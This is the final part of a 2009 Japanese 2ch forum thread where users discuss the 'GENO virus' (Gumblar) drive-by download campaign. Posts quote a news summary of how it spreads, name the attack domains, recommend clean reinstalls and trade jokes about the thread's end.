名無しさん@九周年:2009/05/20(水) 18:12:57 ID:UY0tIqpf0
>>945 ?
それならむしろリスク回避のためMSから乗り換える人が増えるのでは?
948 :
名無しさん@九周年:2009/05/20(水) 18:32:26 ID:sTV4aR6J0
サイト改竄情報がいちばん速いのは・・・ 2ちゃんかも知れんな
>>934 感染しているかどうか確かめて、
してたら、クリーンインストール。
952 :
名無しさん@九周年:2009/05/20(水) 19:11:04 ID:dHXgB1PTP BE:2547629069-2BP(32)
953 :
名無しさん@九周年:2009/05/20(水) 19:16:01 ID:QxMnDh0f0
>>947 ライトユーザーはあんまりそういう選択肢もてないような気がする。
955 :
名無しさん@九周年:2009/05/20(水) 22:07:10 ID:OtxrklTQ0
いわゆる“GENOウイルス”が猛威、G DATAがその挙動を解説
http://internet.watch.impress.co.jp/cda/news/2009/05/20/23509.html G DATA Software株式会社は20日、いわゆる“GENOウイルス”が日本で猛威をふるっているとして、
その挙動を解説するとともに、インターネットユーザーに対策を呼び掛けている。
日本の通販サイトや同人サイトが感染被害
このウイルスは、Adobe FlashやAdobe Reader/Acrobatの脆弱性を突き、ウイルスを仕込んだサイトに誘導することで感染を試みる。
何かをクリックしたり、ダウンロードしたりしなくても、細工されたWebサイトをブラウザで
開いただけで感染する「ドライブバイダウンロード」と呼ばれるものの一種にあたる。
G DATAによると、4月ごろから日本企業のWebサイトや個人サイトなどが改ざんされる被害が多発しており、
実際に感染被害に遭ったPC通販サイト「GENO」の名前をとって、ネット上では“GENOウイルス”と総称されている。
5月中旬にはアニメや漫画、ゲームなどの同人サイトが連鎖的に感染するに至り、
「昨今の豚インフルエンザのパンデミックと重ね合わせて、現在ややパニック状態に陥っているのが現状」。
956 :
名無しさん@九周年:2009/05/20(水) 22:12:33 ID:z1TQQV6G0
>>955 一介のPCパーツ屋の名前が、どんどん広がっていくな・・・
宣伝効果は計り知れない・・・
小林製薬の糸ようじ
GEN○
959 :
名無しさん@九周年:2009/05/20(水) 22:21:41 ID:Zz5w4vMPO
ネット社会を脅かすのは麻薬と同じくらい重罪
960 :
名無しさん@九周年:2009/05/20(水) 22:22:26 ID:XDtq6e9j0
>>956 PC関係者なのに対処法を「クッキー削除して下さい」で済ませた
伝説を残したから
どうオタはそろそろ自重してくれ
なんか感染しそうで
>>961を怖くてクリックできんw
964 :
名無しさん@九周年:2009/05/20(水) 23:23:14 ID:jKSdwPBR0
まあもうぐぐるにもこの名称じゃないと
情報が上手く拾えないからなあ
965 :
名無しさん@九周年:2009/05/21(木) 00:25:09 ID:pRRW2CyZ0
注意喚起あげ
966 :
名無しさん@九周年:2009/05/21(木) 02:22:55 ID:9wv85RMW0
_,,-'' ̄ ̄`-、
/ \
,/ \
/ ― ― ヽ
lヽ - 、 ! , _ |
|r――-、_⊥ ,――'-、 |,-,
|::::::::::::::::/ |ヽ:::::::::::::::|-|'イ!| <Genocide
ト、__,,/: |: `、__,,/ ,|ソ/
.| 、_ j| _,、 ,|-'
| /lll||||||||||l`、 ,|
`i ,|||' ̄= ̄`|||、 / ト、
「|ヽ|ll||||||||||||||||| /i |::::\
/:::::\`!!||||||||||||!!' |::::::::\
/::::::::::::::`ー-、.._ i |::::::::::::::\
/:::::::::::::::::::::::::::::::::::`ー-、. |::::::::::
クソワロタ
968 :
名無しさん@九周年:2009/05/21(木) 11:17:06 ID:hEtMvWrf0
969 :
名無しさん@九周年:2009/05/21(木) 11:20:03 ID:0Y4IHwgY0
マスクをすれば感染は防げる。
うちのPC、熱があるみたいなんだけど・・・
971 :
名無しさん@九周年:2009/05/21(木) 11:33:36 ID:4DQXFeEo0
WindowsとMac以外にも便利に使える新しいOSって出ないものなのかな
これってGENOが原因なのか?
974 :
名無しさん@九周年:2009/05/21(木) 13:01:09 ID:6iMvqEba0
これって、ネットワークPCにも感染すんの?
975 :
名無しさん@九周年:2009/05/21(木) 13:02:16 ID:sllstQsV0
martuz.cnが閉鎖して、落ち着いた感じはあるけど
この静けさが逆に怖いなー・・・
>>971 Linux系はまさにそれじゃないの?
ネット見たりメールしたりなら十分だと思うけど。
978 :
名無しさん@九周年:2009/05/21(木) 20:51:24 ID:bImcq4+E0
>>975 別の国のドメインに移動してそれがまた閉鎖したような?
情報が錯綜してわけわかめ
979 :
名無しさん@九周年:2009/05/21(木) 20:53:32 ID:gzNQz5V90
まだ終わったわけじゃないんだよな……
980 :
名無しさん@九周年:2009/05/21(木) 21:07:53 ID:sllstQsV0
>>975 攻撃サイトは、zlkon.lv(ラトビア)→gumblar.cn(中国)→martuz.cn(イギリス)って
移って行って、最新のmartuz.cnが、今停止状態。
またどこかに移動するのか、これで攻撃やめるか。後者だと良いんだけどね。
981 :
名無しさん@九周年:2009/05/21(木) 21:10:35 ID:xQFJRR5bO
小林製薬の糸ようじ
982 :
名無しさん@九周年:2009/05/21(木) 21:29:35 ID:ooNW8J4x0
983 :
名無しさん@九周年:2009/05/21(木) 23:11:16 ID:vO8i7mlR0
早く終息しないかな
984 :
名無しさん@九周年:2009/05/22(金) 10:00:22 ID:qLy0Lek10
ちょ、まだこのスレ終わってないのかよw
埋めろ埋めろ、糸ようじでも何でもいいからw
985 :
名無しさん@九周年:2009/05/22(金) 10:14:40 ID:NbLU3D/R0
これまだウィルスソフトは検出は出来るけど駆除はできないんだよね?
とりあえず注意喚起あげ
986 :
名無しさん@九周年:2009/05/22(金) 10:30:18 ID:qLy0Lek10
そうなのよ、結局感染したらクリーニンスコ一択。
現在は沈静化してるけど、これからまたどうなるかわからない。
(今までの例からして、ホスト移動して再攻撃はじめるのは週末じゃないかと言われてる)
だから早いとこ2スレ目が立って欲しいんだけんども。
クリーニンスコって何だよ。
クリーンインスコ(クリーンインストール)です、失礼。
989 :
名無しさん@九周年:2009/05/22(金) 10:56:36 ID:ELeWvFyU0
ク リ ー ニ ン ス コ
やめてぇぇ!もう放っておいてぇぇ!
以後1000までクリーニンスコで埋まります
ああ、もうそれでも良いよ。
クリーニンスコ!
逆に考えるんだ。クリーニンスコは欧米式発音であると考えるんだ。
クリーニンスコ に一致する日本語のページ 24 件中 1 - 24 件目 (0.43 秒)
良かった自分だけじゃなかった!
・・・少ねえ・・・。
995 :
名無しさん@九周年:2009/05/22(金) 12:53:12 ID:stBvFJLs0
よーし 1000取り合戦だ いくぞ!!
996 :
名無しさん@九周年:2009/05/22(金) 13:07:33 ID:NbLU3D/R0
ふみだい
997 :
名無しさん@九周年:2009/05/22(金) 13:07:39 ID:yqOJ7riA0
1000なら今週末亜種発動
998 :
名無しさん@九周年:2009/05/22(金) 13:18:45 ID:qLy0Lek10
↓どうぞ
じゃあ1000なら皆クリーニンスコしないで済む!
1001 :
1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。